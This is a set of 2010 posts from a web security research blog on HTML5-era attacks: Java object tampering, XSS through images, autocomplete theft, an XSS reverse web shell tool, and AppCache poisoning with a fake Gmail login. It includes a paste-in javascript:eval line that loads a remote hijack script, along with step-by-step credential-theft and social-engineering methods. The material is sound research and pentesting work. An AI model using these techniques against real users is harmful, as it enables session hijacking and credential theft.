Monday, November 8, 2010

HTML5 goodness at BlackHat Abu Dhabi this week

Just three more days to go for my 'Attacking with HTML5' talk at BlackHat Abu Dhabi. In addition to covering some of the interesting HTML5 attacks already released during 2010 by myself and other researchers, it has two new sections - HTML5 based port scanning and HTML5 Botnets. I would be talking about a new way to perform JavaScript based port scans that gives very accurate results. How accurate? you can determine if the remote port is open/closed/filtered - that accurate. I am also going to release a tool called JSRecon that would perform port and network scans by using these techniques. Under HTML5 botnets I am going to talk about how you could send spam mails, perform a DDoS attack on a website and perform distributed cracking of hashes at incredible speeds - all using JavaScript. I am also going to release Ravan - a web based tool to perform distributed cracking of hashes in a legitimate way. I am pretty happy with the way Ravan has shaped up and am very excited to see how folks react to it. Initial reactions have been good. The whole point of the talk is that I am NOT bypassing any of the restrictions placed by the browser sandbox but instead am working well inside those restrictions - its just that the sandbox has got a whole lot looser :)

The tools and details would be online next week when I am back from Abu Dhabi. Stay tuned!

Tuesday, September 7, 2010

Re-visiting JAVA De-serialization: It can't get any simpler than this !!


Well it's been a while since I have blogged. Been quite busy with work lately. Also I guess Lava is better at blogging stuff so I'll leave that to him :)

After my talk at BH EU earlier this year, there has been quite a lot of other really cool stuff been published on penetration testing of JAVA Thick/Smart clients. Check out Javasnoop especially. It has some pretty good features you would like to use. Many people that I spoke to recently said to me that modifying objects programatically using the IRB shell in DSer would be difficult and it would require the penetration tester to have indepth knowledge of the application's source code. Well; in the first place, penetration testing is a skill and it does require hard work, so understanding the application's internals is part and parcel of the job. But that being said DSer allows you to play around with JAVA objects using an interactive shell with some helper methods and is completely extensible. It was meant to be a template, to add your own stuff and extend it's capabilities.

In this post I will show you a technique which will alow us to extend DSer and simplify the processing of modifying JAVA Objects. Before we start I would like to thank my colleague Chilik Tamir for introducing me to the XStream library and helping with this idea. XStream is a library to serialize JAVA objects to XML and back. Now getting back to the topic. Let's assume that we have a complex object that we encounter in our request or response packet as follows:

HashMap = { key1 = String[], key2 = HashMap }

I have chosen internally available JAVA objects for simplicity, but they can be any custom objects you like. Now modifying this in via HEX bytes would be a difficult task as we will see later. For demostration purposes, i'll make use of the following app:
Fig. 1: Demo app to generate complex JAVA objects
This application will use the inputs we supply in the 3 text fields and create a HashMap similar to the one showed above when the "Both" button is pressed and send it to the backend server for processing. Once we capture this request in Burp, it would give an output similar to this:
Fig. 2: Request showing raw serialized data captured in Burp
Which will be de-serialized and rendered in the DSer shell as follows:

{ keyTwo = [Ljava.lang.String;@70ac2b, 
  keyOne = { hmKey1=Manish,
             hmKey3=Andlabs,
             hmKey2=Saindane
           }
}

We can see that the HashMap has 2 keys (ie. keyOne and keyTwo) with values as a String Array and a HashMap. Now I have added a few custom functions to DSer that will make use of the XStream library and convert the above mentioned JAVA serialized object to XML, save it as a temp file and open it in any XML editor of your choice for further editing. The resulting XML will look as follows:
Fig. 3: XML generated from the JAVA serialized object
Notice how nicely XStream has rendered the XML from the given JAVA object. We can clearly see the <string-array> and the <map> elements (highlighted above) with the individual entries. We can edit the entries and modify it as we want. Let's modify the XML as follows:
Fig. 4: XML after modification
We have removed the "Andlabs" entry from the String Array and added two extra entries (ie. "Lavakumar" and "Kuppan"). Also the "hmKey3" entry has been removed from the inner HashMap (highlighted above). Now as soon as we save this XML and close the editor, the code in DSer will convert this XML back to a JAVA object which will look similar to this:


{ keyTwo = [Ljava.lang.String;@9568c, 
  keyOne = { hmKey1=Manish,,
             hmKey2=Saindane
           }
}

The custom functions will then take care of serializing this object, editing the "Content-Length" header and preparing a new "message" to be sent to the application server. You can observe the modified data in Burp from the history tab.

Fig. 5: Edited request as shown in the Burp
So using this technique, modification of the JAVA objects becomes trivial and anyone with no prior knowledge of programming can edit the objects (as long as he/she knows  how to edit text or XML ;)). The screenshot shows the modified data being successfully passed to the server and rendered back to the output.
Fig 6: Modified data processed by the application
DSer is not just restricted to JAVA serialized objects, but (almost) any binary protocol that you can think of. So do not restrict your thinking and be creative. In this post I just showed you how you can extend DSer's capabilities and simplify the process of editing JAVA objects. You can do the same with any other protocol. All you need is some basic understanding of how the protocol works.

I'll add the the above mentioned custom methods to DSer and release it soon. Just need to clean up the code and make a few changes here and there. If anyone need's to try it out in the mean time, just ping me and I'll give you the source code. So until next time, Happy hacking !!

Tuesday, August 10, 2010

XSSing client-side dynamic HTML includes by hiding HTML inside images and more

Matt Austin made a brilliant discovery sometime back and wrote a detailed post of his hack, you absolutely must read it. Basically it is a problem with sites that use Ajax to fetch pages mentioned in the URL after # and then include them in the innerHTML in a DIV element, he picks 'touch.facebook.com' as an example.

Quoting from his post:
If you click on any URL you see the links don't actually change the page but loads them with ajax. http://touch.facebook.com/#profile.php actually loads http://touch.facebook.com/profile.php into a div on the page.
The problem here is that the XMLHttpRequest object can make Cross Origin calls thanks to HTML5. So if a victim clicks on a link like 'http://touch.facebook.com/#http://attacker.site/evil.php' then 'http://attacker.site/evil.php' is fetched and is included in the innerHTML of the page leading to XSS. Clever find!

The very first paragarph of his post however made me very uncomfortable:
HTML 5 does not do much to solve browser security issues. In fact it actually broadens the scope of what can be exploited, and forces developers to fix code that was once thought safe.
Call me an HTML5 fanboy but I believe the spec designers have taken security very seriously based on the discussions I have seen while lurking on their mailings lists. So such a blatant allegation was hard for me to digest and I was secretly hoping that this design was vulnerable even without taking in to account the Cross Origin Request feature of HTML5.

And it turns out it is actually vulnerable even with plain old HTML4. The problem here is that the application fetches any page which is provided after the # and includes this in the innerHTML of a DIV element. So what this means is that every single file on that site - (CSS|JS|JPG|...|log) is now treated as HTML.

How is this a problem? Lets say the site lets users upload their profile pictures and stores these under the same domain name (FaceBook however uses a different domain name for storing static content). Normally this cannot lead to XSS because the img is only called from the <img> tag which parses and renders it as a image. However under the design being discussed, the same image file can be rendered as HTML. When a victim clicks on a link like 'http://vulnsite.com/#profile_334616.jpg' then 'profile_334616.jpg' is fetched and the 'responseText' is added to the innerHTML property.

It is possible to hide HTML inside images without any visual differences. The HTML can come after the End of Image marker (0xFF D9) or right before that and still the images looks the same. It can also be added in the comment section but some sites might remove the comments section from the images to save storage space. When the content of this image is render as HTML the binary section of the image is considered as text and displayed normally and the HTML section is parsed and rendered by Chrome, Safari and Firefox. Opera and IE however stop parsing after reading a few bytes of the binary content. I tried moving the HTML to the beginning of the image right after the Start of Image marker inside a comment section but still they refused to render it.

Check out this simple POC to see this in action.

Apart from images any user uploaded file could now potentially turn in to HTML under this design. Even if the site does not have any file upload features, an attacker could indirectly upload his images through social engineering. News and media websites routinely include images provided to them from external sources and an attacker could slip in his HTML poisoned image which might eventually end up on the site. Though a little far fetched something like this is not entirely impossible. Any compression technique used by the server on the images would however mangle the HTML.

Another way by which an attacker can get his data on the server is through server logs. If the log file contains all the User-Agent strings in unencoded format then an attacker could include HTML in his request's UA field and poison the server log. An administrator who has access to these logs can be sent a link like http://admin.vulnsite.com/#August2010.log and clicking on it would eventually lead to the rendering of that HTML.

Though there could be other scenario's I think you get the general idea. So coming back to the design itself, it was vulnerable to begin with and HTML5's Cross Origin Request made it incredibly easier to exploit.

Even with all these counter-arguments eventually I have to agree with Matt. Cross Origin Request was one feature where HTML5 did actually get it wrong because they gave additional capability to the same API with absolutely no extra code requirements. So the same code now could do things that the developers never anticipated. Its like suddenly one random morning you hit on your car's accelerator and then find out that now it is also wired to NOS, don't think you would like that surprise.

IE on the other hand had done the right thing with XDomainRequest which is a new API and not a simple extension of XHR. Probably the XMLHttpRequest object must get a new property which should be explicitly set to enable COR.

Eg:
var xhr = new XMLHttpRequest();
xhr.cor = true;
xhr.open("http://external.site/");
A simple extension like this could prevent existing code from becoming vulnerable while giving the same familiar XHR API to developers for COR.

Tuesday, August 3, 2010

Stealing entire Auto-Complete data in Google Chrome

Couple of weeks back Jeremiah Grossman posted details of his Safari Auto-Complete hack along with a really cool POC. To me the most interesting aspect of the POC is how it populates the text box with JavaScript, simulating the victim’s keystrokes.

I ran the POC in Google Chrome and as each character was entered in to the Input box, there was a list of auto-complete suggestions that popped-up. The amount of information that was in those lists was scary. Jeremiah’s POC was not designed to capture the information in the auto-complete suggestion lists, it was only looking for values that got populated in to the textbox.

I initially though it must be relatively easy to capture the information in these lists by simulating a down arrow keypress and then an enter keypress to populate the textbox. But that approach didn’t work because the list that pops up is not part of the DOM, so JavaScript has absolutely no control over this list. Infact moving the mouse over this list or pressing the arrow keys to move through the list of suggestions does not even trigger the Mousemove / KeyDown events.

After playing around for sometime I figured out one way to extract the information from the auto-complete suggestion list. This technique is not entirely automated but it only requires minimal user interaction. The user only has to press the enter key periodically and the rest is done with JavaScript. And to Social Engineer the user to press the enter key, I have written a simple game where the user is randomly shown either a white or a black box and asked to press enter when the black box is shown and do nothing when the white box is shown. The end result is actually pretty convincing.

This is how it works:
  1. User is asked to place his mouse pointer in one section of the page. By following the mouse movement we know exactly where the pointer this is located.
  2. We create an input element of very small width (3px) and position it just a little above where the mouse pointer rests.
  3. Now using the same method used by Jeremiah a character is entered in to the input box.
  4. When the auto-complete suggestion list pops up, the first entry in the list is now right under the mouse pointer and is highlighted automatically.
  5. When the user hits enter (he thinks he is playing a game) this entry is populated in to the input box and is read by JavaScript.
  6. Now the Input box is moved a little upwards and step 3 is repeated and this time the mouse pointer is over the second entry in the suggestion list and it is highlighted.
Step 3-6 are repeated till all values are read.

As you can see the only interaction from the user is hitting the enter key periodically. Chrome allows a maximum of 6 auto-complete suggestions per character and if the user plays the game for a couple of minutes the entire auto-complete suggestion data can be stolen by the attacker.

The POC works best in Google Chrome running on Windows. Because in this set-up an Input element of 3px width has an auto-complete suggestion list also of 3px width, it only looks like a thin white strip. And with a cleverly selected background this 3px strip is camouflaged and becomes practically invisible as done in the POC.

In Google Chrome running on Linux (thanks to Mario for verifying this) the width of the auto-complete box is not affected by the width of the input element, so even if the input element is of 3px the pop-up list is of its normal width. It’s the same story with Firefox even on Windows. If the list is of its normal width then it cannot be hidden from the user, CSS overlay techniques don’t work, and the attack becomes very obvious for the victim to see.

Another factor that makes this attack possible is that when the pop-up list appears, the ‘mousemove’ event is triggered automatically and so the entry under the mouse pointer gets selected without the user having to move the mouse. I am not sure if this is a Google Chrome specific behavior or is common to all browsers, haven’t tested that yet.

The POC is available here and there is also a video if you would like to see the attack in action.

Monday, July 19, 2010

Shell of the Future – Reverse Web Shell Handler for XSS Exploitation


If you claim that "XSS is not a big deal" that means you never owned something by using it and that's your problem not XSS's
-Ferruh Mavituna, Author of XSS Shell, XSS Tunnel and NetSparker
Cross-site Scripting is an interesting vulnerability. It is relatively easier to discover in a Penetration test but demonstrating its impact has always been tricky. So tricky in fact that it has pushed one of the most creative groups of people in IT (Penetration testers) in to using the most boring and misleading POC possible. Yes, you guessed it right, the ubiquitous JavaScript alert() box. To break the monotonousness testers sometimes change the message being displayed but that’s as far as it usually goes. It also has the nasty side effect of developers blocking the word ‘alert’ in their code while ‘eval’ is let through.

In pentests XSS is usually considered as a dead-end vulnerability - you discover it, take a screenshot and move on to something else. It cannot be exploited and used as a stepping stone to another attack because exploiting it would require attacking a user and that is something Penetration testers aren’t allowed to do, the contract 9 out of 10 times only lets us attack the server or the application. That however does not stop the attackers from going so far as to taking over entire servers using a simple XSS in the real world.

The real impact of XSS is that an attacker can do anything that the user can do with his session. Today I am releasing a tool that would let you demonstrate this very impact with the same effort involved as showing the alert box. Ladies and Gentlemen, I give you - Shell of the Future.

Shell of the Future is a Reverse Web Shell handler. It’s the browser equivalent of a reverse command shell, instead of a command prompt from which you type in commands, you get to browse the victim’s HTTP/HTTPS session from your browser. Even though the site is being browsed from the pentester’s browser all the pages are fetched by the victim’s browser. This is done by tunneling HTTP over HTTP using HTML5 Cross Origin Requests. The hijacked session also displays a hovering banner over it which can be heavily customized, making it the perfect POC for your pentest report.

So how does it work? very simple. Shell of the Future has both a proxy server and a web server. The pentester has to set his browser to use Shell of the Future’s proxy server, start the tool and go to http://127.0.0.1/sotf.console from his browser. This shows the web interface from which the victim’s sessions can be hijacked.

Before hijacking a session we need to inject our JavaScript exploit in to the victim’s browser using XSS. Shell of the Future comes with two readymade JavaScript exploits – e1.js and e2.js.

Once injected ( Eg: ) the exploit starts talking to the Shell of the Future server and it becomes available for hijack from the console page. To hijack this session just click on the link that says ‘Hijack Session’ and this session can be browsed from the pentester’s browser.

It is that simple, no installation required, no configuration required, no additional software, it’s all set-up and ready to go at one click.

Even if the site is not vulnerable to XSS the victim’s session can still be hijacked by getting them to paste the following code in the browser’s Address Bar.
Eg:
javascript:eval("s=document.createElement('script');s.src='http://127.0.0.1/e1.js';document.getElementsByTagName('head')[0].appendChild(s)")

Shell of the Future can be downloaded from our tools section and there is also a detailed manual available.
A video demonstration of all the features is available here.

If you are interested in more details then read on.

The tool makes use of HTML5 Cross Origin Requests to tunnel HTTP traffic over HTTP. Once e1.js or e2.js are injected in to the victim’s browser they start polling Shell of the Future(SotF) through Cross Origin Requests(COR). SotF assigns a unique ID for each session and shows this in its console page. When ‘Hijack Session’ is clicked the request from the browser is sent to the SotF proxy which inturn sends it to the SotF server which further passes it on to the victim. The victim fetches the page and sends the response to the SotF server using COR which sends it to the proxy and then to the pentester’s browser.

The two e1.js and e2.js are very similar but e2.js has an extra trick to make the attack more practical. You can only browse the victim’s session for as long as the injected JavaScript is active in the victim’s browser. Sometimes this could be a problem. Let’s say the site with XSS cannot be placed in an iframe then the victim must be directly on the site where the injection is happening. Now the lifetime of the injected scripted is extremely limited because the moment the victim clicks on any links and browses to another page in the site, the script dies. To counteract this, e2.js adds an invisible link to the page and this link is placed exactly under the mouse and follows the mouse moments. When the victim clicks on any part of the page he is actually clicking the invisible link and this link opens the same site in a new tab which also becomes the active tab. Now the victim would happily browse the site in the new tab while the injected script is live in the other tab. The transition to the new tab is pretty smooth so most users would never suspect anything.

If you would want still more details then check the detailed documentation.

I got this idea when reading about HTML5 Cross Origin Requests and thought it was new concept so started this project as a POC. But when I spoke to Manish about it a little latter, he burst my bubble and told me that XSS Tunnel already did something similar. Infact XSS Proxy and XSS Tunnel both did something similar and that too back when there was no COR!! * bows to both Anton Rager and Ferruh Mavituna and thanks Manish for saving me from embarrassment once again *

So I stopped working on it for sometime and then started again with a different approach. Rather than making it a POC for my idea which turned out to be a well known technique, I have made Shell of the Future as a tool specifically to make POCs for XSS and JS Injection vulnerabilities. Both the victim and the attacker can be on the same system just different browsers, Chrome and FireFox are ideal candidates. It works on IE and Safari as well but their aggressive caching can sometime serve stale content. Opera however does not support CORs yet and hence this doesn't work there.

The goal was to make a tool that would accurately demonstrate the severity of XSS with literally the same effort involved as getting the infamous alert box to pop up and I think it has been achieved it.

Also this time around I am providing the source code of the tool as well. It’s not the most elegantly written piece of code but hey, it works!

Sunday, June 27, 2010

Chrome and Safari users open to stealth HTML5 AppCache attack

Google Chrome, Safari, Firefox and Opera(Beta) have implemented the HTML5 Offline Application Cache feature. Using this feature a website can have greater control over the caching process to enable Offline access of websites.

When a website is trying to create an Offline Application Cache, Firefox and Opera ask for user permission and only after the user permitting, the site is able to create this cache. With Google Chrome and Safari this step is skipped, any website can create an Application Cache without the user even knowing about it.

The thing with caches is that they can be poisoned very easily the moment you connect to an unsecured network, like open Wi-Fi. By poisoning a cached JavaScript file of Facebook or Twitter an attacker can eventually take control of your account. But with normal cache, HTTP content can be easily poisoned, but it is difficult to poison a page that is only served over HTTPS. So none of Gmail’s files can be poisoned, they are all over HTTPS.

Now enter HTML5 Application Cache. Unlike a traditional cache, with Application Cache any file can be cached. For example, the root file ‘/’ of a site can be cached. Let’s say an application cache is created for ‘/’ of www.facebook.com. Then every time the user types in www.facebook.com in their browser this cached page would be fetched. If this was done with normal cache then when the user requests this page the browser would send a request to the server for this resource and only if the server responds with a 304 Not Modified response, would the cache be served. But for '/’ all sites would respond back with a 200 OK with the index page’s content and that is what would be loaded and not the cache

The point is that with Application Cache, root files can be cached, this cannot be done with a normal cache. An attacker could then create a malicious cache for the index page of every HTTP site as soon as the victim connects to an unsecured WiFi. For example for Facebook, if the index page is controlled by the attacker then he can capture the username and password of the victim. Facebook being a HTTP site (post authentication) can anyway be compromised by poisoning the normal cache. But Gmail?

Almost all users open Gmail by typing in gmail.com in the address bar and this means its http://gmail.com (remember SSLstrip??). The server responds to this with a redirect to http://mail.google.com/mail/. And when requested for http://mail.google.com/mail/ the server responds with https://www.google.com/accounts/ServiceLogin?service=mail&blahblah... There are two HTTP requests before the server redirects the user to an HTTPS page. Either of those can be cached using Application Cache, http://gmail.com/ or http://mail.google.com/mail/.

This is how the entire attack works:

Step1: The victim connects to an unsecured network controlled by the attacker.

Step2: The victim browses to any random website, even opening the browser would do as it would send a request for the home page.

Step3: The attacker responds to this request with a page which contains an hidden iframe pointing to http://mail.google.com/mail/ .

Step4: The victim’s browser sends a request for http://mail.google.com/mail/.

Step5: The attacker responds to this with his own copy of the Gmail login page that would look exactly like the actual login page but would include a backdoor to steal the victim’s credentials when entered. This page also includes the manifest attribute in the HTML element so that the page is cached.

Step6: Victim goes back to secured network (home/office) and types in gmail.com, gets redirected by Google server to http://mail.google.com/mail/

Step7: The browser would load the fake login page.

Step8: User enters his Gmail credentials in to it, the credentials are sent over to the attacker.

By poisoning or creating a malicious Application Cache, the victim’s credentials to all HTTPS-only websites can be stolen by an attacker.

I have made a POC for this attack using Imposter. The POC comes with a config file loaded with the payloads for Facebook and Gmail. The cached pages would load fake login pages from www.andlabs.org through an iframe. Once the victim enters his username and password these are stored locally in the victim’s browser in the LocalStorage of www.andlabs.org and the credentials are passed on to the parent frame using HTML5 PostMessage API. The parent frame logs the user in using these credentials. The entered credentials can be viewed by visiting, http://www.andlabs.org/hacks/viewcreds.html. The credentials are not sent to the AnD Labs server so it’s safe to try out the POC.

There is a video of the entire attack using the POC here. POC can be downloaded here.

One point of interest is the Manifest file. Everytime a cached file is requested for, the browser would request the server for the Manifest file and if the server responds with a 404 then the cache would be removed. Picking an existing file on the server as the Manifest file would solve this issue as the server would return a 200. This would not result in a update of the cache because the server would not include “text/cache-manifest” in the Content-Type header. Even without this the cache would be served the first time but would be removed after that, using this technique can keep the cached file alive till it is deleted by the user.

Coming back to Chrome and Safari, when I first realized that they were not prompting for user permission I thought it was a serious oversight. I even contacted both the security teams, however they didn’t consider this to be a security issue. But on closer look their stance made sense, it is because they treat Application Cache the same way as normal cache. When you delete cache in these browsers all Application Cache is also deleted. But in Firefox they are handled separately. Deleting normal cache does not delete Application Cache, it has to be deleted explicitly. It is difficult to say which approach is better but the idea of user permission prompt is more reassuring to me. Till then browsing in private/incognito mode should keep user’s safe.

Update:
Chris Evans pointed out on FD that root resources can been cached even by using the normal cache mechanism, so using Application Cache for that reason alone might not gives an edge to the attacker.
However, using Application Cache does have a major advantage over normal cache.
When a root resource is cached using normal cache, it is removed the moment the user hits refresh on that page, but Application Cache stays. This can give an attacker continued access to the victim's browser until the user explicitly clears the cache. In Firefox this has to be done explicitly for Offline Website data.

Sunday, June 13, 2010

HTML5 Security Articles and Live Demos

HTML5 is increasingly getting more attention from the developer community as it brings features that most developers would have never used before. Client-side storage with Web SQL Database, Offline Storage, Cross Origin Requests, Offline Application Cache, Cross Origin Messaging are some of these features that are going to have developers drooling over the next few years at the thought of all the cool things they could do.

With all these new possibilities we are going to have many new types of vulnerabilities and attacks. Security has been a prime consideration in the design of the HTML5 spec , for instance the design of the Web SQL Database API naturally encourages Prepared Statements and it is actually a little harder to introduce SQL Injection vulnerabilities. However implementation mistakes are going to be many and it would be interesting to study them. To help developers avoid more obvious mistakes when implementing these features I have written two detailed articles explaining what could go wrong and how it can be avoided. These articles are on the Web SQL Database and the Cross Origin Request features. Some of the points mentioned might look very obvious but I have personally in my experience doing Penetration tests seen much more obvious mistakes with very serious consequences.

The two articles are:
  1. Web SQL Database Security - http://code.google.com/p/html5security/wiki/WebSQLDatabaseSecurity
  2. Cross Origin Request Security - http://code.google.com/p/html5security/wiki/CrossOriginRequestSecurity

My original idea was to write about them in a series of blog posts but I was in luck because at around the same time Mario announced his HTML5 Security CheatSheet project. And when contacted he liked my idea and was nice enough to add me to his project. So now it is in the form of a Wiki page which is great because it can be updated constantly based on feedback/ideas from readers and findings of other researchers.

There is also a HTML5 Security Quick Reference Guide along with Live Demos of secure and insecure implementation of some features at http://www.andlabs.org/html5.html

All comments/suggestions/feedback are welcome.